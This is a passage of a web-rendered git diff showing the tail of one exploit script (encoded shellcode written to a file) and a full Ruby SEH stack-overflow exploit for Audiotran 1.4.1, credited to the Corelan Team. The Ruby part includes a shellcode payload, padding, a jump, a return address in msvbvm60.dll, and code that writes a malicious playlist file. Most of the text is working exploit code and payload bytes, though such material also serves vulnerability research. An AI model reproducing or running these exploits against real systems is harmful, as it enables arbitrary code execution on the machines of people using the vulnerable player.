"\x51\x44\x42\x48\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x48"
|
||||
"\x55\x4e\x58\x4a\x30\x45\x51\x45\x50\x45\x50\x47\x59\x48\x44"
|
||||
"\x46\x34\x46\x30\x43\x58\x47\x59\x4b\x30\x42\x4b\x45\x50\x4b"
|
||||
"\x4f\x49\x45\x46\x30\x50\x50\x46\x30\x50\x50\x47\x30\x46\x30"
|
||||
"\x47\x30\x50\x50\x45\x38\x4a\x4a\x44\x4f\x49\x4f\x4b\x50\x4b"
|
||||
"\x4f\x48\x55\x4c\x49\x49\x57\x42\x48\x4e\x4c\x42\x30\x50\x4d"
|
||||
"\x48\x5a\x42\x48\x45\x52\x45\x50\x45\x51\x4f\x4b\x4c\x49\x4d"
|
||||
"\x36\x42\x4a\x44\x50\x50\x56\x51\x47\x43\x58\x4c\x59\x49\x35"
|
||||
"\x42\x54\x45\x31\x4b\x4f\x4e\x35\x43\x58\x42\x43\x42\x4d\x42"
|
||||
"\x44\x45\x50\x4c\x49\x4b\x53\x51\x47\x46\x37\x50\x57\x46\x51"
|
||||
"\x4b\x46\x43\x5a\x44\x52\x50\x59\x50\x56\x4a\x42\x4b\x4d\x42"
|
||||
"\x46\x4f\x37\x47\x34\x46\x44\x47\x4c\x45\x51\x43\x31\x4c\x4d"
|
||||
"\x47\x34\x51\x34\x42\x30\x48\x46\x45\x50\x50\x44\x51\x44\x50"
|
||||
"\x50\x46\x36\x50\x56\x46\x36\x47\x36\x51\x46\x50\x4e\x50\x56"
|
||||
"\x46\x36\x46\x33\x51\x46\x42\x48\x43\x49\x48\x4c\x47\x4f\x4d"
|
||||
"\x56\x4b\x4f\x48\x55\x4c\x49\x4d\x30\x50\x4e\x51\x46\x47\x36"
|
||||
"\x4b\x4f\x50\x30\x43\x58\x45\x58\x4b\x37\x45\x4d\x45\x30\x4b"
|
||||
"\x4f\x49\x45\x4f\x4b\x4c\x30\x4f\x45\x4f\x52\x50\x56\x42\x48"
|
||||
"\x49\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43"
|
||||
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x45\x55"
|
||||
"\x4f\x4b\x50\x47\x44\x53\x44\x32\x42\x4f\x42\x4a\x45\x50\x46"
|
||||
"\x33\x4b\x4f\x4e\x35\x44\x4a\x41\x41")
|
||||
|
||||
|
||||
FILE = open(outputfile, \\\\\\\"w\\\\\\\")
|
||||
FILE = open(outputfile, "w")
|
||||
FILE.write(shellcode)
|
||||
FILE.close()
|
|
@ -10,59 +10,59 @@
|
|||
# Type of vuln : Stack Overflow / SEH
|
||||
# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
|
||||
#
|
||||
# Script provided \\\'as is\\\', without any warranty.
|
||||
# Script provided 'as is', without any warranty.
|
||||
# Use for educational purposes only.
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
banner =
|
||||
\\\"|------------------------------------------------------------------|\\\\n\\\" +
|
||||
\\\"| __ __ |\\\\n\\\" +
|
||||
\\\"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\\\n\\\" +
|
||||
\\\"| / ___/ __ \\\\\\\\/ ___/ _ \\\\\\\\/ / __ `/ __ \\\\\\\\ / __/ _ \\\\\\\\/ __ `/ __ `__ \\\\\\\\ |\\\\n\\\" +
|
||||
\\\"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\\\n\\\" +
|
||||
\\\"| \\\\\\\\___/\\\\\\\\____/_/ \\\\\\\\___/_/\\\\\\\\__,_/_/ /_/ \\\\\\\\__/\\\\\\\\___/\\\\\\\\__,_/_/ /_/ /_/ |\\\\n\\\" +
|
||||
\\\"| |\\\\n\\\" +
|
||||
\\\"| http://www.corelan.be:8800 |\\\\n\\\" +
|
||||
\\\"| |\\\\n\\\" +
|
||||
\\\"|-------------------------------------------------[ EIP Hunters ]--|\\\\n\\\\n\\\"
|
||||
"|------------------------------------------------------------------|\n" +
|
||||
"| __ __ |\n" +
|
||||
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
|
||||
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
|
||||
"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n" +
|
||||
"| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n" +
|
||||
"| |\n" +
|
||||
"| http://www.corelan.be:8800 |\n" +
|
||||
"| |\n" +
|
||||
"|-------------------------------------------------[ EIP Hunters ]--|\n\n"
|
||||
|
||||
# Corelan Team MsgBox
|
||||
payload =
|
||||
\\\"\\\\xeb\\\\x22\\\\x56\\\\x31\\\\xc0\\\\x64\\\\x8b\\\\x40\\\\x30\\\\x85\\\\xc0\\\\x78\\\" +
|
||||
\\\"\\\\x0c\\\\x8b\\\\x40\\\\x0c\\\\x8b\\\\x70\\\\x1c\\\\xad\\\\x8b\\\\x40\\\\x08\\\\xeb\\\" +
|
||||
\\\"\\\\x09\\\\x8b\\\\x40\\\\x34\\\\x8d\\\\x40\\\\x7c\\\\x8b\\\\x40\\\\x3c\\\\x5e\\\\xc3\\\" +
|
||||
\\\"\\\\xeb\\\\x69\\\\x60\\\\x8b\\\\x6c\\\\x24\\\\x24\\\\x8b\\\\x45\\\\x3c\\\\x8b\\\\x54\\\" +
|
||||
\\\"\\\\x05\\\\x78\\\\x01\\\\xea\\\\x8b\\\\x4a\\\\x18\\\\x8b\\\\x5a\\\\x20\\\\x01\\\\xeb\\\" +
|
||||
\\\"\\\\xe3\\\\x34\\\\x49\\\\x8b\\\\x34\\\\x8b\\\\x01\\\\xee\\\\x31\\\\xff\\\\x31\\\\xc0\\\" +
|
||||
\\\"\\\\xfc\\\\xac\\\\x84\\\\xc0\\\\x74\\\\x07\\\\xc1\\\\xcf\\\\x0d\\\\x01\\\\xc7\\\\xeb\\\" +
|
||||
\\\"\\\\xf4\\\\x3b\\\\x7c\\\\x24\\\\x28\\\\x75\\\\xe1\\\\x8b\\\\x5a\\\\x24\\\\x01\\\\xeb\\\" +
|
||||
\\\"\\\\x66\\\\x8b\\\\x0c\\\\x4b\\\\x8b\\\\x5a\\\\x1c\\\\x01\\\\xeb\\\\x8b\\\\x04\\\\x8b\\\" +
|
||||
\\\"\\\\x01\\\\xe8\\\\x89\\\\x44\\\\x24\\\\x1c\\\\x61\\\\xc3\\\\xad\\\\x50\\\\x52\\\\xe8\\\" +
|
||||
\\\"\\\\xaa\\\\xff\\\\xff\\\\xff\\\\x89\\\\x07\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\" +
|
||||
\\\"\\\\x44\\\\x44\\\\x47\\\\x47\\\\x47\\\\x47\\\\x39\\\\xce\\\\x75\\\\xe6\\\\xc3\\\\x4c\\\" +
|
||||
\\\"\\\\x4c\\\\x4c\\\\x4c\\\\x89\\\\xe5\\\\xe8\\\\x68\\\\xff\\\\xff\\\\xff\\\\x89\\\\xc2\\\" +
|
||||
\\\"\\\\xeb\\\\x1c\\\\x5e\\\\x8d\\\\x7d\\\\x04\\\\x89\\\\xf1\\\\x80\\\\xc1\\\\x0c\\\\xe8\\\" +
|
||||
\\\"\\\\xc8\\\\xff\\\\xff\\\\xff\\\\xeb\\\\x15\\\\x31\\\\xd2\\\\x59\\\\x88\\\\x51\\\\x36\\\" +
|
||||
\\\"\\\\x51\\\\x52\\\\xff\\\\x54\\\\x24\\\\x0c\\\\xe8\\\\xdf\\\\xff\\\\xff\\\\xff\\\\x57\\\" +
|
||||
\\\"\\\\x7f\\\\x29\\\\x62\\\\xe8\\\\xe6\\\\xff\\\\xff\\\\xff\\\\x43\\\\x6f\\\\x72\\\\x65\\\" +
|
||||
\\\"\\\\x6c\\\\x61\\\\x6e\\\\x20\\\\x54\\\\x65\\\\x61\\\\x6d\\\\x20\\\\x53\\\\x68\\\\x65\\\" +
|
||||
\\\"\\\\x6c\\\\x6c\\\\x63\\\\x6f\\\\x64\\\\x65\\\\x20\\\\x2d\\\\x20\\\\x50\\\\x72\\\\x6f\\\" +
|
||||
\\\"\\\\x67\\\\x72\\\\x61\\\\x6d\\\\x20\\\\x65\\\\x78\\\\x70\\\\x6c\\\\x6f\\\\x69\\\\x74\\\" +
|
||||
\\\"\\\\x65\\\\x64\\\\x20\\\\x73\\\\x75\\\\x63\\\\x65\\\\x73\\\\x73\\\\x66\\\\x75\\\\x6c\\\" +
|
||||
\\\"\\\\x6c\\\\x79\\\\x58\\\"
|
||||
"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
|
||||
"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
|
||||
"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
|
||||
"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
|
||||
"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
|
||||
"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
|
||||
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
|
||||
"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
|
||||
"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
|
||||
"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
|
||||
"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
|
||||
"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
|
||||
"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
|
||||
"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
|
||||
"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
|
||||
"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
|
||||
"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
|
||||
"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
|
||||
"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
|
||||
"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
|
||||
"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
|
||||
"\x6c\x79\x58"
|
||||
|
||||
print banner
|
||||
puts \\\"[+] Exploit for Audiotran 1.4.1.\\\"
|
||||
puts "[+] Exploit for Audiotran 1.4.1."
|
||||
|
||||
filename = \\\"audiotran_poc.pls\\\"
|
||||
f = File.new(filename, \\\'w\\\')
|
||||
f.write \\\'A\\\' * 1308 #padding
|
||||
f.write \\\"\\\\xeb\\\\x06\\\\x90\\\\x90\\\"
|
||||
f.write \\\"\\\\xcb\\\\x75\\\\x52\\\\x73\\\" # ret at 0x735275CB [msvbvm60.dll]
|
||||
filename = "audiotran_poc.pls"
|
||||
f = File.new(filename, 'w')
|
||||
f.write 'A' * 1308 #padding
|
||||
f.write "\xeb\x06\x90\x90"
|
||||
f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
|
||||
f.write payload
|
||||
f.write \\\'A\\\' * 9000 # padding
|
||||
f.write 'A' * 9000 # padding
|
||||
f.close
|
||||
|
||||
puts \\\"[+] Wrote exploit file : #{filename}.\\\"
|
||||
puts "[+] Wrote exploit file : #{filename}."
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue